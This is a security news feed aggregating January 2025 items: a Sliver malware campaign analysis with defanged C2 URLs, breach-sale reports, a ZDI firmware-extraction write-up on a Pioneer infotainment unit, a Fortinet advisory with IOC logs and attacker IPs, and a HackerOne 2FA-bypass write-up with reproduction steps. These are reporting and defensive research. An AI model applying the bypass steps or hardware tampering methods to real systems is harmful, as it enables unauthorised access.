DLL Proxying, the attackers can maintain the normal behavior of the infected application while running their malicious code in the background. Once the ccache.dat file is read and decrypted, it reveals the shellcode, which, in turn, runs another decryption process to retrieve the actual payload. This multi-layered decryption makes it even harder for security solutions to detect the attack until it has already caused damage. The final payload is the Sliver implant, which establishes a communication channel with the attacker’s server, allowing them to execute further operations on the compromised system. The Role of Sliver in the Attack The Sliver implant, which is an open-source framework for Red Team operations, is used by the attackers to control the infected system. This framework allows for sophisticated remote control and monitoring of the compromised network. The implant can be used to execute a wide range of malicious activities, from stealing data to deploying additional malware. Once the Sliver implant is active, it connects to remote servers, specifically: hxxp://www.technikzwerg[.]de/auth/auth/authenticate/samples.html hxxp://www.technikzwerg[.]de/auth/auth/authenticate/samples.php These remote endpoints are used by the attackers to further exploit the victim’s system, facilitating the installation of additional malicious payloads or the exfiltration of sensitive data. Potential Attribution While the specifics of the attack are still under investigation, there are several indicators that suggest it could be the work of APT29, a well-known cyber threat group often associated with advanced persistent threats (APT). The use of DLL Sideloading, the deployment of Sliver, and the sophisticated nature of the attack are consistent with tactics previously observed in APT29 campaigns. However, the introduction of DLL Proxying is a new technique that hasn’t been seen in their previous operations, making definitive attribution challenging. Implications for German Entities The attack specifically targets organizations in Germany, as evidenced by the German-language lure document and the fact that the initial archive file was uploaded to VirusTotal from a location in Germany. The lure document, which masquerades as a Home Office Agreement, appears to be designed to exploit the growing trend of remote work in Germany, making it highly relevant to the country’s current workforce dynamics. This cyberattack highlights the growing complexity of modern threats, particularly those targeting businesses and organizations with high-value data or critical infrastructure. Recommendations and Mitigations To protect against attacks like this, organizations should consider implementing the following measures: Strengthen email filtering systems to identify and block phishing emails that may contain malicious attachments. Use whitelisting to prevent unauthorized execution of suspicious files, such as LNK files or unauthorized DLLs. Deploy EDR solutions to detect and block DLL Sideloading and shellcode injection activities. Monitor outbound network traffic for unusual activity, such as unexpected connections to Sliver endpoints or other suspicious servers. Educate employees about the dangers of phishing and the importance of exercising caution when opening email attachments or links from unknown senders. Conclusion The Sliver implant campaign targeting German organizations demonstrates the increasing sophistication of cyber threats. By employing techniques such as DLL Sideloading and DLL Proxying, the attackers are able to bypass traditional security measures and establish persistent access to compromised systems. This multi-stage attack highlights the need for enhanced detection and defense strategies to counter increasingly complex threats.
by The Cyber Express
2025-01-21 08:18:48
Threat Actor Claims Sale of 318 Million Otelier RecordsA threat actor known as “Ay4me” has put up for sale a trove of 318 million records on BreachForums, claiming the data was stolen from Otelier, a cloud-based hotel management platform. The stolen database, totaling 7.8TB, reportedly contains sensitive information from major hotel chains such as Marriott, Hilton, and Hyatt. The data leak was disclosed … The post Threat Actor Claims Sale of 318 Million Otelier Records appeared first on CyberInsider.
by Cyber Insider
2025-01-21 05:00:00
Cosmos Series Part 4: Results-Oriented Critical ThinkingExplore how Bishop Fox integrates critical thinking into Cosmos development to enhance scalability, flexibility, and velocity. By focusing on outcomes and adopting structured analytical processes, we’ve avoided design pitfalls and empowered our teams to deliver impactful solutions.
by Bishop Fox
2025-01-21 05:00:00
Sneak Peek into Fetch the Flag CTF 2025Fetch the Flag, Snyk''s annual Capture the Flag (CTF) competition, is back for 2025. Join this exciting virtual event on February 27, 2025, hosted by Snyk and cybersecurity expert John Hammond, from 9 am to 9 pm ET.
by Snyk
2025-01-21 00:00:00
Leveraging CrowdStrike Falcon Against Attacks Targeting Okta Environments
by CrowdStrike
2025-01-21 00:00:00
Cleo MFT: CVE-2024-50623Learn about CVE-2024-50623 affecting Cleo MFT products. Patch now to prevent RCE attacks and secure your systems.
by Recorded Future
2025-01-21 00:00:00
Annual Payment Fraud Intelligence Report: 2024Explore 2024 payment fraud trends with Recorded Future: e-skimming, scam e-commerce, dark web insights, and 2025 predictions.
by Recorded Future
2025-01-20 23:59:00
Last Week in Security (LWiS) - 2025-01-20Windows LPE (@MrAle_98), CLR OPSEC (@passthehashbrwn), WinRM BOFs (@falconforceteam), Bitlocker bypass (@Neodyme), BloodHound CLI (@cmaddalena), and more!
by Bad Sector Labs
2025-01-20 22:46:25
HPE is investigating IntelBroker’s claims of the company hackHPE is probing claims by the threat actor IntelBroker who is offering to sell alleged stolen source code and data from the company. Last week, the notorious threat actor IntelBroker announced on a popular cybercrime forum the sale of data allegedly stolen from HPE. IntelBroker, known for leaking data from major organizations, made the headlines […]
by Security Affairs
2025-01-20 20:38:00
Unsecured Tunneling Protocols Expose 4.2 Million Hosts, Including VPNs and RoutersNew research has uncovered security vulnerabilities in multiple tunneling protocols that could allow attackers to perform a wide range of attacks. ""Internet hosts that accept tunneling packets without verifying the sender''s identity can be hijacked to perform anonymous attacks and provide access to their networks,"" Top10VPN said in a study, as part of a collaboration with KU Leuven professor
by The Hacker News
2025-01-20 20:35:17
Esperts found new DoNot Team APT group’s Android malwareResearchers linked the threat actor DoNot Team to a new Android malware that was employed in highly targeted cyber attacks. CYFIRMA researchers linked a recently discovered Android malware to the Indian APT group known as DoNot Team. The Donot Team (aka APT-C-35 and Origami Elephant) has been active since 2016, it focuses on government and military organizations, […]
by Security Affairs
2025-01-20 20:23:00
DoNot Team Linked to New Tanzeem Android Malware Targeting Intelligence CollectionThe Threat actor known as DoNot Team has been linked to a new Android malware as part of highly targeted cyber attacks. The artifacts in question, named Tanzeem (meaning ""organization"" in Urdu) and Tanzeem Update, were spotted in October and December 2024 by cybersecurity company Cyfirma. The apps in question have been found to incorporate identical functions, barring minor modifications to the
by The Hacker News
2025-01-20 18:16:08
Belsen Group Leaks 15,000+ FortiGate Firewall ConfigurationsFortiGate firewall leak exposes 15,000+ configurations, impacting organizations globally. The actor behind the leak is Belsen Group. Learn…
by Hackread
2025-01-20 17:32:00
⚡ THN Weekly Recap: Top Cybersecurity Threats, Tools and Tips [20 January]As the digital world becomes more complicated, the lines between national security and cybersecurity are starting to fade. Recent cyber sanctions and intelligence moves show a reality where malware and fake news are used as tools in global politics. Every cyberattack now seems to have deeper political consequences. Governments are facing new, unpredictable threats that can''t be fought with
by The Hacker News
2025-01-20 17:04:13
Name That Toon: IncentivesFeeling creative? Have something to say about cybersecurity? Submit your caption and our panel of experts will reward the winner with a $25 gift card.
by Dark Reading
2025-01-20 16:53:32
🐝 Hive Five 207 - Brain Rot and One Man ArmiesEditing with LLMs, 80% faster Ax framework, AI-first Director of Finance, Obsidian 2024 Gems of the Year Voting, 8 Lessons from Red Teaming 100 Gen AI Products, The Big Ass Data Broker Opt-Out List, and more...
by Hive Five
2025-01-20 16:40:00
Product Walkthrough: How Satori Secures Sensitive Data From Production to AIEvery week seems to bring news of another data breach, and it’s no surprise why: securing sensitive data has become harder than ever. And it’s not just because companies are dealing with orders of magnitude more data. Data flows and user roles are constantly shifting, and data is stored across multiple technologies and cloud environments. Not to mention, compliance requirements are only getting
by The Hacker News
2025-01-20 16:39:46
Malicious VPN Extensions Found Spying on Chrome UsersA new investigation by security researcher Wladimir Palant reveals that malicious VPN extensions on the Chrome Web Store are using obfuscation techniques to bypass Google''s remote code execution restrictions. These extensions secretly collect browsing data, manipulate user traffic, and employ anti-debugging measures to evade detection. Intrusive VPN extensions Palant found that 32 VPN extensions rely … The post Malicious VPN Extensions Found Spying on Chrome Users appeared first on CyberInsider.
by Cyber Insider
2025-01-20 16:29:18
New AiTM PhaaS Platform ‘Sneaky 2FA’ Targets Microsoft 365 AccountsA newly identified Adversary-in-the-Middle (AiTM) phishing kit, dubbed Sneaky 2FA, is being distributed as a Phishing-as-a-Service (PhaaS) operation on Telegram, enabling cybercriminals to bypass multi-factor authentication (MFA) protections for Microsoft 365 accounts. Sekoia’s Threat Detection & Research (TDR) team discovered the phishing kit in December 2024 during routine threat-hunting activities and has since linked it … The post New AiTM PhaaS Platform ‘Sneaky 2FA’ Targets Microsoft 365 Accounts appeared first on CyberInsider.
by Cyber Insider
2025-01-20 16:20:07
Flaw in ChatGPT API Allows Powerful Reflective DDoS AttacksA newly disclosed vulnerability in OpenAI''s ChatGPT API allows attackers to trigger Distributed Denial-of-Service (DDoS) attacks against arbitrary websites using OpenAI''s own infrastructure. The flaw enables an unauthenticated attacker to overwhelm a target website with HTTP requests originating from OpenAI''s Microsoft Azure-hosted servers. OpenAI, a leading artificial intelligence research organization, operates ChatGPT, one of the … The post Flaw in ChatGPT API Allows Powerful Reflective DDoS Attacks appeared first on CyberInsider.
by Cyber Insider
2025-01-20 16:00:00
Attack Tactics 9: Shadow Creds for PrivEsc w/ Kent & JordanIn this video, Kent Ickler and Jordan Drysdale discuss Attack Tactics 9: Shadow Credentials for Primaries, focusing on a specific technique used in penetration testing services at Black Hills Information Security The post Attack Tactics 9: Shadow Creds for PrivEsc w/ Kent & Jordan appeared first on Black Hills Information Security.
by Black Hills Information Security
2025-01-20 16:00:00
Looking at the Attack Surfaces of the Pioneer DMH-WT7600NEX IVIFor the upcoming Pwn2Own Automotive contest, a total of four in-vehicle infotainment (IVI) head units have been selected as targets. One of these is the single-DIN Pioneer DMH-WT7600NEX. This unit offers a variety of functionality, such as wired and wireless Android Auto and Apple CarPlay, USB media playback, and more. This blog post aims to detail some of the attack surfaces of the DMH-WT7600NEX unit as well as provide information on how to extract the software running on this unit for further vulnerability research.Software ExtractionThe initial effort to locate a serial console in the hope of easy software extraction bore no fruit. This left only a handful of options:· Work with the software update package instead. However, the package was found to be encrypted, making this approach a dead end initially; more on that below.· Attempt to desolder the eMMC chip and dump its contents using a programmer. This necessitates reballing and resoldering the eMMC chip, which is risky without proper SMD rework equipment.· Attempt to extract eMMC contents in-system. This does not require any SMD rework, but the signal locations must be known, and the system must be powered and held in reset while dumping is in progress.The researchers chose the last option. Connecting to the eMMC chip could be performed via (thankfully labeled) test points on the board. The missing MMC_CLK signal was probed for using an oscilloscope; here is where it was found after numerous attempts. In addition to that, the main SoC was held in reset by pulling the test point labelled RSTN to ground via a 220 Ohm resistor and a switch.Note that when the SoC is held in reset, the 3.3V power line is cycled periodically by some other component, which powers off the eMMC chip. This is likely some watchdog component attempting to bring the system out of a hung state. Finding that component and persuading it not to do that was deemed too time consuming, and the 3.3V power rail was instead powered directly through a bench power supply.Data at RestAfter the eMMC chip was successfully “backed up,” it was time for Trend ZDI researchers to have a look at the 8 gigabytes of its contents. The image was found to sport a GPT partition table, with the following partitions defined after mounting the image via the loopback interface on a test system: There are two sets of bootable images, consisting of the header, boot, system, dtb, hirtos, bootloader, chips, and backup partitions. It is likely this is to safeguard against failed software updates, so there is a known good set of bootable images. Let’s have a closer look at what is contained in each partition:· The header partition contains what looks like to be a description of other partitions in the set.· The bootloader partition contains the bootloader as described, which seems to be a version of fastboot.· The boot partition contains the Android/Linux kernel version 3.18.24.· The dtb partition contains the DTB blob as described.· The system partition contains the root file system.· The hirtos partition contains a firmware image with ARM instructions. The exact purpose of this code is not currently known. The image consists of several chunks of code/data; some of it is obvious ARM code while others appear to be bitmap images. The following string was found inside the first chunk: “T-Monitor/triton_TCC897x Version 2.01.00” This suggests the code is to be executed on the main SoC but likely on a separate core.· The chips partition contains the firmware for the GNSS daughter board.· The backup partition contains some kind of binary data, rather sparsely organized.Interestingly enough, the system itself appears to be a Linux-based one; none of typical Android infrastructure could be located there. All the custom software is concentrated in /usr/local/ subdirectories.Software UpdatesObtaining an image of the code running on the device allowed a second look at the software update format. The latest update file can be obtained from the manufacturer; unfortunately, they do not seem to list previous versions. This is justified, as downgrading the software is not officially supported anyway—as the team found out firsthand.The software update package is structured like this:· A header of 0x100 bytes describing the file, specifically the header size and the total size of the image, software version in this update, plus which model the update is for.· An RSA signature block of 0x100 bytes, which can be verified by a certain public key hardcoded in the software. The signature covers the described header only.· An RSA signature block of 0x100 bytes, which can be decrypted by the same key, and which carries an AES-256 key instead of the digest.· Update data, encrypted with AES-256-CBC using the all-zero IV. This decrypts into a gzipped “raw” update image.The raw update image in turn consists of headers very similar to what can be found in the header partitions followed by a series of images for each partition mentioned in the headers. The image(s) can be processed further to extract the content of interest like the root file system.Serial ConsoleArmed with some knowledge of the unit’s software, it was time to revisit the search for the serial console.By studying the contents of the bootloader partitions, Trend ZDI researchers discovered the bootloader may use values from the backup partitions to decide which values to pass via the `console` and `login` kernel parameters, among other things. Specifically, the sector at byte offset 0x800800 contains that data. The format which this data is in can be reverse engineered both from the bootloader and the NPSystemDebug class implementation. Notably, it appears that manipulation of these values could be performed via the UI as the code flow can be traced all the way to the `UI_UIEB_MM_99_018` class which implements two buttons changing the state of the values. However, at the moment of writing it was unknown how to reach that specific UI screen.Thus, the direct manipulation of the flags was chosen instead. The contents of the backup partition were altered to enable both serial console and the login prompt. After probing the board connectors for any semblance of serial data, it was discovered on CN3603 pin 7. Connecting a UART-to-USB dongle to that pin confirmed that indeed, console output is present, as well as the login prompt. Only three signals are routed to that connector; however, the RX signal was not immediately identified among those.Studying the bottom layer of the board showed a single installed passive among several missing ones; this was one resistor pulling up a line otherwise not connected to any connector pin. Probing that line for being the missing RX line resulted in a success. Likely, one of the missing passives should connect that line to a connector pin. Now it was possible to communicate with the device—and log in locally. Having console access is always a big boon in vulnerability research.BluetoothThe vendor lists the following supported Bluetooth profiles:· Advanced Audio Distribution Profile (A2DP)· Hands-Free Profile· Serial Port Profile· Audio/Video Remote Control Profile (AVRCP) v1.6Given the rich history of bugs in Bluetooth-related functionality, this could be an interesting attack vector Wi-FiThe unit can be set up in both the client and access point modes for Wi-Fi.When in the AP mode, the unit allows using the WPS setup in addition to entering the PSK. This could potentially be an interesting attack angle as WPS flows were historically weak to attacks.After connecting to the unit in AP mode and running a network scan, the following TCP ports were found to be open: 5000, 38000, 38001, 42000, 43000, and 60000. Nmap script scan only showed that port 5000 uses TLS with a self-signed certificate; other services were not recognized. Using the console access, it is possible to map out the open ports to the corresponding processes (only ports allowed through the iptables are shown here for brevity): Given the abundance of what looks like non-standard services, Wi-Fi connectivity presents a potenially rewarding target for vulnerability research.USBThe unit is equipped with a single USB-C port that provides the necessary interface for wired Android Auto and Apple CarPlay. The USB port also supports playback of audio files from a USB flash drive. The supported audio filetypes are · MP3· WMA· WAV· AAC· FLAC· DSDThe unit also supports video playback with the following formats listed as supported:· AVI· MPEG· DivX· MP4· 3GP· MKV· FLV· WMV/ASF· M4V· H.263, H.264In addition, it is also possible to view images in BMP, JPEG, and PNG formats. Parsing complex file formats is error-prone and has been a rich source of exploitable bugs since time immemorial.Android Auto and Apple CarPlay Both wired and wireless Android Auto and Apple CarPlay are supported without the need for a third-party application to be installed on the paired mobile phone. When using the wireless versions, the paired phone connects to the aforementioned Wi-Fi network to establish a high-bandwidth channel for data to be sent and received. When connecting using a USB cable, the Wi-Fi network isn''t used by Android Auto or Apple CarPlay and can be disabled in Settings. As evidenced above, the `Media` process is likely responsible for handling both.Pwn2Own Automotive 2024 didn’t see any entries that leveraged Android Auto or Apple CarPlay functionality to compromise a head unit. We will have to wait and see if Pwn2Own Automotive 2025 does!SummaryWe hope that this blog post has provided enough information about the Pioneer DMH-WT7600NEX attack surface to guide vulnerability research. Not every attack surface has been mentioned, and we encourage researchers to investigate further. We are looking forward to Automotive Pwn2Own, again to be held in January 2025 at the Automotive World conference in Tokyo. We will see if IVI vendors have improved their product security. Don’t wait until the last minute to ask questions or register! We hope to see you there.You can find me on Mastodon at @InfoSecDJ, and follow the team on Twitter, Mastodon, LinkedIn, or Bluesky for the latest in exploit techniques and security patches.
by Zero Day Initiative Blog
2025-01-20 15:46:24
Fortinet Zero-Day CVE-2024-55591 Exposed: Super-Admin Access RiskOverview Fortinet, a global leader in cybersecurity solutions, recently released a critical advisory addressing a significant vulnerability (CVE-2024-55591) in its FortiOS and FortiProxy products. This flaw, which has a CVSSv3 score of 9.6, is categorized as a critical authentication bypass vulnerability and is currently being exploited in the wild. Attackers leveraging this vulnerability can potentially gain super-admin privileges by exploiting weaknesses in the Node.js WebSocket module, making this a high-stakes issue for organizations relying on Fortinet''s products. This blog provides a detailed overview of the vulnerability, affected versions, Indicators of Compromise (IOCs), mitigation strategies, and steps for administrators to protect their systems effectively. The Vulnerability Explained The CVE-2024-55591 vulnerability stems from an ""Authentication Bypass Using an Alternate Path or Channel"" issue (CWE-288). An attacker can craft malicious requests to the Node.js WebSocket module, bypass authentication, and gain unauthorized super-admin access. Once exploited, the attacker can perform a wide range of malicious activities, including: Creating administrative or local user accounts. Modifying firewall policies, addresses, or system settings. Establishing Secure Sockets Layer Virtual Private Network (SSL VPN) tunnels to access internal networks. Affected Products and Versions The vulnerability impacts the following versions of FortiOS and FortiProxy products: FortiOS Versions 7.0.0 through 7.0.16 are affected. Versions 7.6, 7.4, and 6.4 are not affected. FortiProxy Versions 7.0.0 through 7.0.19. Versions 7.2.0 through 7.2.12. Versions 7.6 and 7.4 are not affected. Solution: Upgrade FortiOS to version 7.0.17 or later. Upgrade FortiProxy to versions 7.0.20 or 7.2.13 or later. How Attackers Exploit the Vulnerability Attackers exploit this vulnerability by sending malicious WebSocket requests to bypass authentication controls. They can target administrative accounts by guessing or brute-forcing usernames. Once access is gained, they perform the following malicious actions: Create random user accounts such as ""Gujhmk"" or ""M4ix9f"". Add these accounts to administrative or VPN groups. Use SSL VPN connections to infiltrate the internal network. Indicators of Compromise (IOCs) Fortinet has shared some key IOCs that organizations should monitor to identify potential attacks. Log Entries Look for the following types of suspicious log entries in your system: Successful Admin Logins: type=""event"" subtype=""system"" level=""information"" logdesc=""Admin login successful"" user=""admin"" ui=""jsconsole"" srcip=1.1.1.1 dstip=1.1.1.1 action=""login"" status=""success"" msg=""Administrator admin logged in successfully from jsconsole"" Unauthorized Configuration Changes: type=""event"" subtype=""system"" level=""information"" logdesc=""Object attribute configured"" user=""admin"" ui=""jsconsole(127.0.0.1)"" action=""Add"" msg=""Add system.admin vOcep"" Suspicious IP Addresses Attackers have been observed using the following IP addresses to launch attacks: 45.55.158.47 (most commonly used) 87.249.138.47 155.133.4.175 37.19.196.65 149.22.94.37 It’s important to note that these IP addresses are not fixed sources of attack traffic; they are often spoofed and may not represent the actual origin. Recommended Actions 1. Update Immediately If your organization is using affected versions of FortiOS or FortiProxy, the most effective solution is to upgrade to the latest secure versions. Fortinet has provided tools to assist with upgrading, which can be found on their official site. 2. Mitigations for Immediate Protection If an upgrade cannot be performed immediately, consider implementing the following mitigations: Disable HTTP/HTTPS Administrative Interfaces: This reduces the exposure of management interfaces to the internet. Restrict Access with Local-In Policies:Limit access to the administrative interface by allowing only trusted Ips Use Non-Standard Admin Usernames: To make brute-force attacks more difficult, avoid predictable or default usernames for administrative accounts. Exploitation in the Wild Reports indicate active exploitation of this vulnerability. Threat actors have been observed creating random administrative or local user accounts, such as: Gujhmk Ed8x4k Alg7c4 These accounts are often added to SSL VPN user groups to establish tunnels into internal networks, making it critical to monitor for unauthorized account creation. Best Practices for Enhanced Security Enable Logging and Monitoring:Continuously monitor system logs for any unauthorized administrative activity, suspicious configuration changes, or unexpected VPN connections. Conduct Regular Vulnerability Scans:Perform routine scans to identify and patch other vulnerabilities within your network infrastructure. Adopt a Zero Trust Approach:Limit user privileges to the minimum required and enforce strict access controls, especially for administrative tasks. Educate Your Team:Ensure that your IT and security teams are aware of this vulnerability and trained to respond to potential threats. Implement Multi-Factor Authentication (MFA):Although this vulnerability bypasses traditional authentication, MFA adds an additional layer of security that can mitigate other attack vectors. Conclusion The CVE-2024-55591 vulnerability emphasizes the critical need for organizations to stay ahead of emerging threats. With attackers actively exploiting this flaw to gain super-admin access, the risks to your infrastructure and data cannot be overstated. Organizations using FortiOS and FortiProxy must act immediately. Patching systems and implementing mitigations isn’t optional; it’s imperative. It’s not just about reacting to vulnerabilities—it’s about adopting a proactive and layered approach to cybersecurity. Leveraging tools like multi-factor authentication, real-time log monitoring, and Zero-Trust architectures can significantly reduce the risk of exploitation. The broader lesson here is clear: vulnerabilities are inevitable, but breaches don’t have to be. By staying informed, investing in advanced threat detection systems, and fostering a security-first mindset within your organization, you can not only address immediate threats but also build resilience against future ones. As cyber threats grow more advanced, are you prepared to meet them head-on? Strengthening your defenses today will determine your security tomorrow. Let this be a reminder to continuously innovate and adapt in the face of an ever-changing threat landscape. Your next step could define the safety of your organization. Source: https://www.csa.gov.sg/alerts-advisories/alerts/2025/al-2025-004 https://www.fortiguard.com/psirt/FG-IR-24-535 https://nvd.nist.gov/vuln/detail/CVE-2024-55591 The post Fortinet Zero-Day CVE-2024-55591 Exposed: Super-Admin Access Risk appeared first on Cyble.
by CYBLE
2025-01-20 15:29:25
Forward-Thinking Industry Leaders Sponsor Most Inspiring Women in Cyber Awards 2025Eskenzi PR are proud to announce that KnowBe4, Mimecast, Varonis, Bridewell, Certes, and Pentest Tools have joined BT as sponsors for this year’s Most Inspiring Women in Cyber Awards. The 5th annual event, held at the iconic BT Tower on the 26th February 2025, aims to celebrate trailblazers from across the cybersecurity industry who are […] The post Forward-Thinking Industry Leaders Sponsor Most Inspiring Women in Cyber Awards 2025 appeared first on IT Security Guru.
by IT Security Guru
2025-01-20 15:22:23
How I found S3 buckets in Bug bountiesCloud enumeration and exploitationContinue reading on InfoSec Write-ups »
by InfoSec Write-ups
2025-01-20 15:20:25
Bypass HackerOne 2FA requirement and reporter blacklistSeverity: Medium (5.0) — High (7.1)Weakness: Improper AuthorizationBounty: $10,000 Summary:First, the initial submission got a bounty of $2,500. But while HackerOne was doing their Root Cause Analysis (RCA) of my report submission, they have stumbled upon another vulnerability with High severity.Since my submission gives them a nudge in the right direction, they rewarded me another $7,500 for the increase scope of finding.Research:My routine when i am hunting on HackerOne main platform is always checking if they have new incoming feature, And i saw that there is beta feature called Embedded Submission Form which enables hackers to Anonymously submit reports without having to create an account on HackerOne. For additional information. Learn more here.Now, with that new feature i have found an Improper Authorization bug that bypasses the 2 security features of HackerOne for the bug bounty programs.Bypass 2FA requirements when submitting new reports to a program. Learn more here.Bypass hacker blacklisted by a program (when a program does not want to receive report from specific hackers). Learn more here.Bypass 2FA requirements when submitting new reports to a programA program owner can enforce the hackers to setup the two-factor authentication before submitting new reports to their program here: https://hackerone.com/<program>/submission_requirements (see below image)Enabled 2FA requirementsThe Parrot Sec program has this feature enabled to enforce the hackers to setup 2FA before submitting reports. I removed my 2FA in my account to test and it is good that i was block from submitting new reports (see below image)2FA required by the program before submitting new reports.Now i was able to bypass this 2FA setup requirements by using the Parrot Sec program Embedded Submission Form.Steps to reproduce:Login to your account and remove your 2FA on your account (if you already setup it)Now go to https://hackerone.com/parrot_sec and hit Submit Report button, observed that you cannot submit report unless you will enable your 2FA.BYPASS: Get the Embedded Submission URL on their policy page: i get this > https://hackerone.com/<redacted_UUID>/embedded_submissions/newNow submit report using that embedded submission form and you can submit reports without setting-up your 2FA, despite the program enforce the user to setup the 2FA before submitting new reports.2FA requirements successfully bypassed!ImpactUsers can still submit a report to a program despite the program owner require a 2FA enabled to account before hacker can submit reports.Bypass Hacker Blacklisted to a programIf a hacker’s behavior is out of sync with what is outlined on bug bounty program Security Page, or if they’ve violated part of the HackerOne Code of Conduct, program owners can take action to ban hackers from participating in their program. BBP program owners can ban hackers from both private and public programs. (see below image), For additional information.. Learn more here.Program blacklisting hackers.So i ask a good friend of mine Ace Candelario (phspade) to ban my h1/japz account on HackerOne Parrot Sec program from submitting a new report, btw he is the Philippine Ambassador of Parrot Security and one of the Triager in Parrot Sec hackerone program. After banning my account i try to submit a report and clicking on the submit report button redirects me to Page not found error page (see below).Error page when you are banned to specific program and try to submit a report.It’s good, the reason why i cannot submit a new report is because i am banned/black-listed on the parrot sec program. :)But using the same steps to reproduce on my first bypass above (Bypassing 2FA requirements), I was able to submit a new report to the bbp program despite i am already banned.ImpactMalicious user can still submit a report as many as he/she want despite the program owner banned/black-list the hackers.Note: This second bypass have turns out to have the same root cause of the first bypass above, therefore it was closed as duplicate of my first report #418767.HackerOne Co-Founder Jobert closed the report as duplicate because it has the same root cause of the first bug mentioned above.Disclosure Timeline2018–10–04 02:41:19 — Report submitted to HackerOne security team.2018–10–05 20:07:59 — Security team acknowledge and Triage the report2018–10–05 20:53:21 — $10,000 Bounty rewarded.2018–10–06 00:38:15 — Fix for the High severity bug released to production, while the initial submission (Medium) was still ongoing fix.2018–10–25 23:11:03 — Fix for Medium severity bug that is initially reported was released to production2018–10–25 23:11:03 —Status: ResolvedOriginal submission reference: Hacker can bypass 2FA requirement and reporter blacklist through embedded submission formShout’out to all Pinoy Bug Bounty Hunters out there! :)Cheers!Japzhttps://twitter.com/japzdivinohttps://instagrahttps://www.facebook.com/pinoywhitehatBypass HackerOne 2FA requirement and reporter blacklist was originally published in InfoSec Write-ups on Medium, where people are continuing the conversation by highlighting and responding to this story.
by InfoSec Write-ups
2025-01-20 15:03:57
20th January– Threat Intelligence ReportFor the latest discoveries in cyber research for the week of 20th January, please download our Threat Intelligence Bulletin. TOP ATTACKS AND BREACHES Hotel management platform Otelier has suffered a data breach that resulted in extraction of almost eight terabytes of data. The threat actors compromised company’s Amazon S3 cloud storage, stealing guests’ personal information […] The post 20th January– Threat Intelligence Report appeared first on Check Point Research.
by Check Point Research
2025-01-20 15:02:37
Is Carding Still a Thing in 2025Is the Threat Finally Diminishing?”Continue reading on InfoSec Write-ups »
by InfoSec Write-ups
2025-01-20 15:00:00
Manager as mentor: Learnings from Sysdig’s documentation teamAfter years in the technical writing trenches at industry giants like Cisco, Riverbed, and Akamai, I now lead the Sysdig... The post Manager as mentor: Learnings from Sysdig’s documentation team appeared first on Sysdig.
by Sysdig
2025-01-20 14:54:49
Cyble Sensors Detect Attacks on Check Point, Ivanti and MoreCyble honeypots have detected vulnerability exploits on Check Point and Ivanti products, databases, CMS systems, and many other IT products. Overview Cyble honeypot sensors have detected new attacks on vulnerabilities in Check Point and Ivanti products, among dozens of other vulnerability exploits recently picked up by Cyble sensors. Cyble’s sensor intelligence reports to clients in the first two weeks of 2025 also highlighted new database and CMS attacks. Unpatched Linux systems and network and IoT devices remain popular targets for hackers looking to breach networks and add to botnets. The reports also examined new brute-force attacks and phishing campaigns. Here are some of the highlights. Vulnerabilities Under Attack Here are some of the vulnerability exploits detected by Cyble sensors. CVE-2024-24919 is an 8.6-severity vulnerability affecting Check Point CloudGuard Network, Quantum Maestro, Quantum Scalable Chassis, Quantum Security Gateways, and Quantum Spark Appliances, identified by Check Point being actively exploited. If successfully exploited, the vulnerability could allow an attacker to access sensitive information on Internet-connected Gateways that have a remote access VPN or mobile access enabled, and potentially move laterally and gain domain admin privileges. Ivanti had a challenging 2024, with 11 vulnerabilities added to CISA’s Known Exploited Vulnerabilities catalog, trailing only Microsoft, and new vulnerabilities have already been added this year. One particular Ivanti vulnerability that Cyble is detecting attacks on is CVE-2024-7593, a 9.8-severity Ivanti Virtual Traffic Manager (vTM) vulnerability that enables a remote, unauthenticated attacker to bypass admin panel authentication due to a flawed implementation of the authentication algorithm. Attackers are exploiting CVE-2024-8503, a time-based SQL injection vulnerability in VICIDIAL that could allow an unauthenticated attacker to enumerate database records. By default, VICIDIAL stores plaintext credentials within the database. VICIDIAL is a software suite that works with the Asterisk Open-Source PBX Phone system to create an inbound/outbound contact center. CVE-2024-7120 is a critical OS command injection vulnerability in the web interface of Raisecom MSG gateways, specifically MSG1200, MSG2100E, MSG2200, and MSG2300 devices running version 3.90. The flaw in the list_base_config.php file allows remote attackers to exploit the template parameter to execute arbitrary commands. Public exploits are available for this vulnerability. CVE-2024-56145 is a critical vulnerability in Craft CMS systems. If the register_argc_argv setting in php.ini is enabled, this issue affects users of impacted versions, allowing an unspecified remote code execution vector. Users are advised to update to versions 3.9.14, 4.13.2, or 5.5.2. Those unable to upgrade should mitigate the risk by disabling register_argc_argv in their PHP configuration. Cyble sensors have also identified attackers scanning for the URL ""/+CSCOE+/logon.html"", which is used to access the login page for the Cisco Adaptive Security Appliance (ASA) WebVPN service. The URL has been found to have various vulnerabilities, including cross-site scripting, path traversal, and HTTP response splitting, which could allow attackers to execute arbitrary code, steal sensitive information, or cause a denial of service. Brute-Force Attacks The Cyble sensor reports also include considerable detail on brute-force attacks. These attacks frequently target remote desktops and access systems, with ports 5900 (VNC), 3389 (RDP), and 22 (SSH) being the most frequently attacked ports. Other frequently attacked ports include 3386 (GPRS tunneling), 445 (SMB), and 23 (Telnet). Cyble advises adding security system blocks for frequently attacked ports. Recommendations and Mitigations Cyble researchers recommend the following security controls: Blocking target hashes, URLs, and email info on security systems (Cyble clients receive a separate IoC list). Immediately patch all open vulnerabilities listed here and routinely monitor the top Suricata alerts in internal networks. Constantly check for Attackers’ ASNs and IPs. Block Brute Force attack IPs and the targeted ports listed. Immediately reset default usernames and passwords to mitigate brute-force attacks and enforce periodic changes. For servers, set up strong passwords that are difficult to guess. Conclusion With many active threats against both new and older vulnerabilities, organizations need to remain vigilant and responsive, patching quickly and applying mitigations where patching isn’t possible. To protect their digital assets, organizations should address known vulnerabilities and implement recommended security controls, such as blocking malicious IPs and securing network ports. A proactive and layered security approach is critical for defending against exploits and data breaches. To access the full sensor intelligence reports from Cyble, along with IoCs and additional insights and details, click here. The post Cyble Sensors Detect Attacks on Check Point, Ivanti and More appeared first on Cyble.
by CYBLE
2025-01-20 14:50:24
Your location or browsing habits could lead to price increases when buying onlineCompanies are showing customers different prices for the same goods and services based what data they have on them, including details like their precise location or browser history.
by Malwarebytes Labs
2025-01-20 14:32:58
From Assessment to Action: The Red Siege Security Posture Review Is HereAt Red Siege, we’ve earned our reputation as a leader in offensive security by delivering expert-driven solutions that prioritize what matters most to CISOs and cybersecurity professionals. From penetration testing […]
by Red Siege Blog
2025-01-20 14:30:00
US Ban on Automotive Components Could Curb Supply ChainThe US Department of Commerce will prohibit the import of components for connected vehicles from China or Russia, as the US continues to ban technology it sees as potential national security threats.
by Dark Reading
2025-01-20 14:00:00
